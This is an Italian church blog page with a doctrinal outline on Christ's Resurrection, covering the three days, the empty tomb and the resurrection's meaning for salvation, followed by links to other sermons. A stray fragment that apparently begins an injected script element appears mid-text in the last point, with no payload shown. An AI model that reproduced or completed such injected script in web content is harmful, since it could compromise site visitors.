LA RESURREZIONE

INTRODUZIONE: 

Molti vogliono inserire in questo soggetto dottrinale anche le “ipotesi” o le “analisi” relative al ministero di Cristo durante le ore della morte; noi pensiamo che esso prescinde totalmente dall’argomento, mentre invece, può essere considerato pertinente quello della durata della morte.  Matteo 12:40, 10:34; Luca 9:22, 24:46, 18:33; l Corinzi 15:4. Versi tutti che parlano del terzo giorno, ci parlano di tre giorni e tre notti.

Storicamente (dai Vangeli) si può concludere che non sono state 72 ore, ma forse la metà (solo il sabato è stato completo) ed infatti anche la prima letteratura cristiana, per esempio “Il credo: Il terzo giorno…”, non parla di tre giorni e tre notti.

Sono state date molte spiegazioni:

1)    il raffronto con l’episodio di Giona vuole essere figurativo e come per le parabole, più dei particolari propone l’argomento;

2)    la dizione “giorno e notte”, rappresenterebbe una forma idiomatica (simile alla nostra: una giornata), che non sempre si riferisce alla totalità del giorno ma semplicemente alla sua successione astronomica;

3)    qualcuno ha anche avanzato l’ipotesi, che a noi sembra ardita, che Gesù si sia riferito anche al periodo precedente alla sua morte, quando moralmente è sceso nelle parti più basse dell’annichilimento (Filippesi 2:8).

Chiusa questa parentesi introduttiva, entriamo nel vivo dell’argomento.

1-  ASPETTO STORICO DELLA RESURREZIONE.

a)   La resurrezione non ha avuto testimoni (Marco 16:3,4).

Nota: Quando affermiamo che la resurrezione di Cristo è un episodio storico solidamente provato, affermiamo una verità incontrovertibile; ma quando parliamo dei testimoni della resurrezione, dobbiamo precisare che essi hanno verificato oggettivamente un fatto già verificatosi e quindi hanno reso una testimonianza assolutamente valida.

b)   La rimozione della pietra avvenne quando la resurrezione di Gesù era già verificata (Matteo 28:2).

c)    Le condizioni nell’interno della tomba, sembrano parlare di un sereno risveglio e di un corpo, ormai glorificato, che si sottrae da quelli che sono stati prima i suoi necessari rivestimenti (Giovanni 20:5,7).

Nota: Sembra che Dio abbia riservato per Se alcuni atti del ministero di Cristo: l’ingresso nell’umano (Matteo 1:18) e l’uscita dall’umano…

Quindi non “guardie che cadono a ritroso…”, l’immagine tanto cara all’iconografia cattolica, e non discepoli che vedono un corpo che riacquista vita, ma un atto divino che è potenza di resurrezione e trasforma un corpo, da una dimensione fisica, sottoposta alle leggi naturali, ad un corpo spirituale che può usare o superare quelle leggi: Gesù nelle apparizioni, di volta in volta, partecipa a comportamenti umani e manifesta proprietà spirituali: si fa toccare, mangia,… entra a porte chiuse, scompare ecc.;

d)   Le successive apparizioni (l Corinzi 15:5).

Note: Delle apparizioni parleremo specificatamente in seguito.

 2-  SIGNIFICATO SOTERIOLOGICO DELLA RESURREZIONE.

a)   Manifestazione della potenza vittoriosa nel piano della Redenzione. (Efesi 1:19, 20).

Nota: la resurrezione è stata definita la Waterloo dell’inferno (Napoleone non è morto, ma i suoi sogni e le sue ambizioni sono sepolti). Per questo Paolo parla con una successione di aggettivi sembrano “classificare” la potenza della Resurrezione, trasferita in retaggio alla chiesa.

b)   Affermazione esplicita e definitiva della divinità di Cristo (Romani 1:4).

Nota: La morte di Cristo è prova della sua umanità, la resurrezione quella della sua divinità (Giovanni 2:19).

c)    Compimento nel tempo del piano della Redenzione (Romani 4:25).

Nota: Quando, per fede, c’identifichiamo con Cristo crocifisso, accettiamo, nel Suo sacrificio compiuto per noi, la liberazione dalla condanna dal peccato. Quando c’identifichiamo nella Sua resurrezione (Colossesi 3:1) accettiamo pienamente quella nuova condizione che è assenza di presenza e potenza del peccato;

d)   Dimostrazione della Resurrezione, come presente in Cristo. (Giovanni 11:25).

Nota: Risposta celeste a coloro che come Marta concepiscono Cristo soltanto in relazione al passato (se fossi stato qui) o al futuro (So che resusciterà). Gesù era già resurrezione: Egli è l’eterno presente (Ebrei 13:8): Io sono con voi.

e)   Inizio dell’ultimo atto della grazia: la resurrezione è la glorificazione. (I Corinzi 15:20).

Nota: Le molte resurrezioni ricordate dalla Bibbia, sia nell’antico che nel nuovo Testamento, sono semplicemente un temporaneo ritorno alla vita fisica; quella di Cristo è la Resurrezione nella sua pienezza (Apocalisse 1:18; Romani 6:9).

f)     La manifestazione di ciò che saranno i credenti (l Giovanni 3:2; Colossesi 3:4; I Corinzi 15:23).var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Amare Dio con tutto il cuore.

di Agostino Masdea   –  Marco 12:28-34   –  Fin dal giorno che siamo nati di nuovo, continuiamo ad essere  meravigliati ed affascinati dall’amore di Dio. Come Suoi figli sappiamo che Egli ci invita alla Sua presenza perché ci ama e perché vuole essere amato da noi. Il Suo desiderio per ogn’uno di noi è che possiamo “crescere nella grazia e nella conoscenza del Suo Figliuolo Gesù Cristo” …
Leggi Tutto

TROVARE GRAZIA

di Agostino Masdea  –  Libro di RUTH –  CAPITOLO 2   –   Introduzione. – Abbiamo visto nel cap. precedente che Ruth, nel paragone con Orpa, si differenzia, emerge e si impone alla nostra attenzione per il suo carattere. Qualcuno ha affermato che nessuna persona, se non è motivata da Dio, può fare ciò che fece Ruth. I. – RUTH, FIGURA DELLA CHIESA 1. – Il passaggio dalla terra …
Leggi Tutto

CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

«Il calice della benedizione che benediciamo, non è la comunione col sangue di Cristo? Il pane che noi rompiamo, non è la comunione col corpo di Cristo? Siccome vi è un unico pane, noi, che siano molti, siamo un corpo unico, perché partecipiamo tutti a quell’unico pane» (1 Corinzi 10:16-17). L’Apostolo Paolo sentì la necessità di chiarire ai Corinzi il significato della Cela del Signore, che era, oltre al battesimo, l’unico …
Leggi Tutto

BALSAMO DI GALAAD

 di LILIAN B. YEOMANS Tanto tempo fa, su una collina solitaria, tre croci, le vedo ancor! Tanto tempo fa il Salvatore disse, mentre chinava il Suo capo morente: «Tutto è compiuto». Balsamo di Galaad, guarisci le mie ferite, rendimi  interamente sano e forte, Tu sei la Medicina che io prendo, e subito la mia salute irrompe: «Tutto è compiuto».  Geremia 8:22: «Non c’è balsamo in Galaad? Non c’è laggiù nessun medico?» Che …
Leggi Tutto

UNA PROMESSA PER OGGI: "HO PREPARATO COSE STUPENDE PER COLORO CHE MI AMANO"

1 Corinzi 2: 9 – Ma come sta scritto: “Le cose che occhio non ha visto e che orecchio non ha udito e che non sono salite in cuor d’ uomo, sono quelle che Dio ha preparato per quelli che lo amano”. Quando mia moglie ed io ospitiamo una festa di compleanno o un evento speciale per i nostri cari, un prepariamo e pianifichiamo prima un sacco di …
Leggi Tutto

Sermone: RESA INCONDIZIONATA

“RESA INCONDIZIONATA”  …
Leggi Tutto

C'E' POTENZA NEL SANGUE DI GESU'

di Charles Greeneway  –  Ricordo nel 1945, quando giacevo in una capanna di fango in Africa. Avevo la febbre nera, ed era un tempo in cui si poteva morire di quella malattia. Ho contato 124 tombe di missionari che non avevano raggiunto i quarant’anni. Ho seppellito i miei amici, ho dovuto imbracciare un fucile per poter difendere il loro corpo esanime dagli animali feroci perché al mattino potessimo …
Leggi Tutto

PERCHÉ SONO PENTECOSTALE

di   Luis H. Hauff –  Recentemente mi è stato chiesto di parlare sulle credenze dottrinali delle Assemblee di Dio ad una classe dell’Università di Redlas. L’interesse generale verteva su ciò che distingue le Assemblee di Dio dalle altre denominazioni: il parlare in altre lingue. Dissi alla classe che la mia fede nella Pentecoste è basata sul fatto che il parlare in lingue, secondo come lo Spirito dà da …
Leggi Tutto

Dai nostri Culti